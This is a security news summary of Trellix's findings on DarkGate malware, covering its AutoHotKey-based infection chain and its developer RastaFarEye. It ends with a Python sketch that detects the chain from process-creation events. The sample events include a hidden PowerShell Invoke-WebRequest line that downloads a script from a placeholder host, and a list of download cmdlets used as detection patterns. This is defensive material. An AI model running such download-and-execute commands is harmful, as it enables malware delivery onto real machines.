Recent cyber campaigns deploying DarkGate malware have leveraged AutoHotKey in place of AutoIt scripts during the malware's intermediary infection stage. Trellix has disclosed these adaptations along with fresh insights into the developer known as RastaFarEye. Recognized for its capabilities as a Remote Access Trojan (RAT), DarkGate has required continuous updates to evade detection by security defenses; the most recent version, DarkGate 6, launched in early 2024, reflects these ongoing modifications. Despite significant setbacks, including a ban from underground forums over service complaints, RastaFarEye remains active in both distributing and updating DarkGate. Trellix notes, "This situation may have been detrimental to the economic interests of RastaFarEye; however, DarkGate continues to be distributed and updated regularly. Therefore, we believe that RastaFarEye persists in selling and developing the service despite the ban from underground forums."

The infection chain outlined by Trellix begins with phishing emails carrying either an Excel or an HTML attachment. When the attachment is opened, a VBScript is downloaded from an external host over SMB using the remote template injection technique. That script in turn downloads a PowerShell script, which uses the "Invoke-WebRequest" cmdlet to retrieve an AutoHotKey script together with a text file containing the encoded DarkGate payload. In the final stage, the AutoHotKey script decodes and executes the DarkGate malware. DarkGate version 6 is built to bypass security software, using evasion techniques such as process hollowing and DLL injection, and it supports a broad set of commands ranging from system surveillance to data exfiltration.
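The stage order above (Office attachment, script host, PowerShell download via Invoke-WebRequest, AutoHotKey interpreter) is what a defender can hunt for in process-creation telemetry. The following is an added detection sketch, not code from Trellix or the report; the executable names assigned to each stage and the sample events are assumptions and constructed data.

```python
"""Hunt for the DarkGate delivery lineage described above in process-creation events:
Office attachment -> script host -> PowerShell using Invoke-WebRequest -> AutoHotkey."""
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Assumed image names for each stage (not taken from the report itself).
OFFICE = {"excel.exe", "winword.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
AUTOHOTKEY = {"autohotkey.exe", "autohotkeyu64.exe", "autohotkey64.exe"}
DOWNLOAD_CMDLETS = ("invoke-webrequest", "iwr ", "wget ", "curl ")  # cmdlet and its aliases

def lineage(events, pid):
    """Ancestor chain of `pid`, oldest first; a missing parent or a cycle ends the walk."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain[::-1]

def find_darkgate_chains(events):
    """PIDs of AutoHotkey processes descended from an Office process through a
    PowerShell process that invoked a download cmdlet (the reported stage order)."""
    hits = []
    for e in events:
        if e.image.lower() not in AUTOHOTKEY:
            continue
        chain = lineage(events, e.pid)
        office = next((i for i, c in enumerate(chain) if c.image.lower() in OFFICE), None)
        if office is None:
            continue
        if any(c.image.lower() in POWERSHELL
               and any(tok in c.cmdline.lower() for tok in DOWNLOAD_CMDLETS)
               for c in chain[office + 1:]):
            hits.append(e.pid)
    return hits

# Constructed events: one malicious chain (pids 100-400) plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "explorer.exe", "explorer.exe"),
    ProcEvent(100, 1, "EXCEL.EXE", '"EXCEL.EXE" invoice.xlsx'),
    ProcEvent(200, 100, "wscript.exe", r"wscript.exe //B \\share\tmpl.vbs"),
    ProcEvent(300, 200, "powershell.exe",
              "powershell -w hidden -c Invoke-WebRequest hxxp://example.invalid/a.ahk -o a.ahk"),
    ProcEvent(400, 300, "AutoHotkey.exe", "AutoHotkey.exe a.ahk"),
    ProcEvent(500, 1, "AutoHotkey.exe", "AutoHotkey.exe hotkeys.ahk"),  # user's own script
    ProcEvent(600, 1, "powershell.exe", "powershell -c Invoke-WebRequest https://update.example"),
]
```

Only the AutoHotKey process whose ancestry passes through both an Office process and a downloading PowerShell process is flagged; a user's own hotkey script and an administrator's Invoke-WebRequest on their own are left alone.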
